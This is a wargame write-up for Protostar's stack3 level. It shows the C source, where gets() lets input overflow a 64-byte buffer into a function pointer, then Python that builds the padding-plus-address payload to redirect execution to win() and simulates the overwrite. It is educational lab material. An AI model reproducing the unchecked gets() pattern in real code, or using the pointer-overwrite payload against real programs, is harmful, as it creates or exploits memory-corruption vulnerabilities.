About

Stack3 looks at environment variables, and how they can be set, and overwriting function pointers stored on the stack (as a prelude to overwriting the saved EIP)
Hints:
  • both gdb and objdump are your friends in determining where the win() function lies in memory.
This level is at /opt/protostar/bin/stack3

Source code

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
    printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
    volatile int (*fp)();   /* function pointer stored on the stack, right after buffer */
    char buffer[64];

    fp = 0;

    gets(buffer);           /* no length check: input longer than 64 bytes runs into fp */

    if(fp) {                /* only reached once the overflow has made fp non-zero */
        printf("calling function pointer, jumping to 0x%08x\n", fp);
        fp();               /* whatever address was written over fp is called here */
    }
}

From the hints we learn that gdb is the tool to use. gdb is a very handy debugger; for details on how to use it, Google it...

From the previous levels you should quickly realize that you only need to push the input past the 64 bytes of buffer to get into the critical if statement. But then you find that you still need to end up inside the win() function, and we don't know what win's address is. This is where gdb comes in.

The address of the win function turns out to be 0x08048424, so now it's easy: just overwrite fp with 0x08048424...
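As an added illustration (not part of the original writeup, and not code from the Protostar project), the following Python models the frame layout the writeup relies on: 64 bytes of buffer immediately followed by the 4-byte fp. That 64-byte offset and the address 0x08048424 are taken from the writeup; the names build_payload and simulate_frame are hypothetical. The point it makes explicit is byte order: on x86 the value 0x08048424 must be written as the bytes 24 84 04 08, which struct.pack("<I", ...) does, and a line of exactly 64 bytes leaves fp at 0 so the if body is never entered.

```python
import struct

# Frame layout of main() as the writeup describes it: 64 bytes of buffer,
# then the 4-byte function pointer fp. The offset 64 is taken from the
# writeup's "push past 64 bytes"; confirm it in gdb before relying on it.
BUFFER_LEN = 64
WIN_ADDR = 0x08048424  # address the writeup recovered for win() with gdb


def build_payload(win_addr, buffer_len=BUFFER_LEN):
    """Return the line gets() would read: filler for the whole buffer,
    followed by the target address in little-endian (x86) byte order."""
    padding = b"A" * buffer_len
    # '<I' = little-endian unsigned 32-bit: 0x08048424 -> 24 84 04 08
    return padding + struct.pack("<I", win_addr)


def simulate_frame(line, buffer_len=BUFFER_LEN):
    """Model the frame as a bytearray [buffer][fp], copy `line` into it the
    way gets() does (no length check), and read fp back as a 32-bit
    little-endian integer. Returns (buffer_contents, fp_value)."""
    frame = bytearray(buffer_len + 4)  # buffer followed by fp, fp starts at 0
    if len(line) > len(frame):
        # Past fp lie the saved EBP and EIP; this model does not cover them.
        raise ValueError("line would write past fp, which this model does not cover")
    frame[: len(line)] = line          # the unchecked copy: this is the overflow
    fp = struct.unpack_from("<I", frame, buffer_len)[0]
    return bytes(frame[:buffer_len]), fp


def reaches_win(line, win_addr=WIN_ADDR):
    """True if, after the modelled overflow, fp holds exactly win's address."""
    return simulate_frame(line)[1] == win_addr


if __name__ == "__main__":
    # Constructed inputs illustrating the three cases in the writeup:
    # exactly 64 bytes (fp untouched), 65 bytes (fp non-zero but garbage),
    # and the full payload (fp == win's address).
    for label, line in (("64 bytes", b"A" * 64),
                        ("65 bytes", b"A" * 65),
                        ("payload", build_payload(WIN_ADDR))):
        _, fp = simulate_frame(line)
        print(f"{label:>8}: fp = 0x{fp:08x}, reaches win: {reaches_win(line)}")
```

The middle case is the trap the writeup mentions: anything longer than 64 bytes enters the if, but with an arbitrary byte over fp the call lands somewhere meaningless and the program crashes, which is why the address from gdb is needed rather than just a longer line.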